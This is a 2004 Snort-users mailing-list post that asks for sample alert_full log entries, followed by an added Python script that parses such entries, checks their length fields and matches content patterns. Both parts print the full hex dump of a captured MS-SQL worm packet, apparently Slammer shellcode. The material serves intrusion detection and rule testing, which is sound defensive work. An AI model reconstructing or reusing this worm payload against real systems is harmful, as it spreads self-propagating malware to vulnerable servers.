[Snort-users] Search examples of alert_full

Guillaume Rix Guillaume.Rix at ...5663...
Tue Oct 12 03:02:55 EDT 2004


Hi,

I am looking for an example of each Snort signature in the following log format (header + payload):

[**] MS-SQL Worm propagation attempt [**]
10/09/04-00:30:43.255016 72:A9:20:0:1:0 -> 1:0:1:0:0:0 type:0x800 len:0x1A2
200.121.5.101:1806 -> 62.34.163.248:1434 UDP TTL:118 TOS:0x0 ID:46681 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

I am building a web interface to delete, create, modify, test, compare and perform other actions on Snort rules.

If you could help me with extracts of logs in this format, it would be very much appreciated.

Guillaume
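As an added example (not from the original post and not Snort's own code): the record above is one alert_full entry, so a rule-testing front end has to parse exactly that layout. The Python below assumes only the UDP record shown and the "=+=+" separator that alert_full prints after each entry. It splits a log into records, reads the header fields, rebuilds the payload bytes from the hex columns, cross-checks the three lengths Snort prints (len:, DgmLen, Len:) against each other and against the dump, and runs a minimal content:/depth: match over the payload. The content patterns at the bottom are picked from the dump itself for illustration; they are not the text of any real Snort rule.

```python
"""Parse Snort alert_full records (header + hex dump) and cross-check them; added example, not Snort code."""
import re
from typing import Dict, List, Tuple

SEPARATOR = r"^=\+=\+.*$"     # alert_full ends every record with a line of "=+=+..."
ETH_HDR_LEN, UDP_HDR_LEN = 14, 8

MSG_RE = re.compile(r"^\[\*\*\] (?P<msg>.+?) \[\*\*\]$")
# "\s*" before "type:" also accepts dumps where that space is missing.
ETH_RE = re.compile(r"^(?P<ts>\S+) (?P<smac>[0-9A-Fa-f:]+) -> (?P<dmac>[0-9A-Fa-f:]+)\s*"
                    r"type:(?P<etype>0x[0-9A-Fa-f]+) len:(?P<flen>0x[0-9A-Fa-f]+)$")
IP_RE = re.compile(r"^(?P<sip>[\d.]+):(?P<sport>\d+) -> (?P<dip>[\d.]+):(?P<dport>\d+) "
                   r"(?P<proto>\w+) TTL:(?P<ttl>\d+) TOS:(?P<tos>0x[0-9A-Fa-f]+) ID:(?P<id>\d+) "
                   r"IpLen:(?P<iplen>\d+) DgmLen:(?P<dlen>\d+)$")
LEN_RE = re.compile(r"^Len: (?P<len>\d+)$")
INT_FIELDS = ("sport", "dport", "ttl", "id", "iplen", "dlen", "len")
HEX_FIELDS = ("etype", "flen", "tos")


def parse_record(lines: List[str]) -> Dict:
    """One record (separator excluded) -> dict of header fields plus 'payload' bytes."""
    lines = [ln.rstrip() for ln in lines if ln.strip()]
    matches = [rx.match(ln) for rx, ln in zip((MSG_RE, ETH_RE, IP_RE, LEN_RE), lines)]
    if len(matches) < 4 or not all(matches):
        raise ValueError("unrecognised alert_full header: %r" % lines[:4])
    rec: Dict = {k: v for m in matches for k, v in m.groupdict().items()}
    for k in INT_FIELDS:
        rec[k] = int(rec[k])
    for k in HEX_FIELDS:
        rec[k] = int(rec[k], 16)
    # The 16 byte pairs fill the first 47 columns; the ASCII column after them can
    # itself contain hex-looking text, so slice by column instead of splitting.
    rec["payload"] = bytes.fromhex("".join(ln[:48] for ln in lines[4:]).replace(" ", ""))
    return rec


def parse_alert_full(text: str) -> List[Dict]:
    """Split an alert_full stream on its separator lines and parse each record."""
    chunks = re.split(SEPARATOR, text, flags=re.M)
    return [parse_record(c.splitlines()) for c in chunks if c.strip()]


def consistency_problems(rec: Dict) -> List[str]:
    """Cross-check the lengths alert_full prints against each other and the dump."""
    if rec["proto"] != "UDP":
        return ["only the UDP layout from the post is checked"]
    dumped, from_hdrs = len(rec["payload"]), rec["dlen"] - rec["iplen"] - UDP_HDR_LEN
    checks = [
        (dumped == rec["len"], "hex dump has %d bytes, Len: says %d" % (dumped, rec["len"])),
        (rec["flen"] == ETH_HDR_LEN + rec["dlen"],
         "frame len %d != 14 + DgmLen %d" % (rec["flen"], rec["dlen"])),
        (from_hdrs == rec["len"], "DgmLen - IpLen - 8 = %d, Len: says %d" % (from_hdrs, rec["len"])),
    ]
    return [text for ok, text in checks if not ok]


def content_match(payload: bytes, patterns: List[Tuple[bytes, int]]) -> bool:
    """Minimal 'content:'/'depth:' test: every pattern must occur, and a pattern
    with depth > 0 must lie entirely within the first `depth` bytes."""
    return all(payload.find(pat, 0, depth or len(payload)) != -1 for pat, depth in patterns)


# Test input: the record from the post (ASCII column corrected from the hex).
SAMPLE = """\
[**] MS-SQL Worm propagation attempt [**]
10/09/04-00:30:43.255016 72:A9:20:0:1:0 -> 1:0:1:0:0:0 type:0x800 len:0x1A2
200.121.5.101:1806 -> 62.34.163.248:1434 UDP TTL:118 TOS:0x0 ID:46681 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
"""

# Illustrative patterns picked from that payload; not the text of any real Snort rule.
WORM_PATTERNS = [(b"\x04", 1), (b"\x81\xf1\x03\x01\x04\x9b\x81\xf1\x01", 0), (b"sock", 0), (b"send", 0)]

if __name__ == "__main__":
    for rec in parse_alert_full(SAMPLE):
        print(rec["msg"], consistency_problems(rec) or "lengths consistent", content_match(rec["payload"], WORM_PATTERNS))
```

Running the file prints the parse of the sample; pointing parse_alert_full() at a real alert file is the same call. A non-empty list from consistency_problems() is the quickest way to catch a truncated or hand-mangled record before it reaches the rule tester, since the three lengths Snort prints must agree with each other and with the number of bytes actually dumped.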
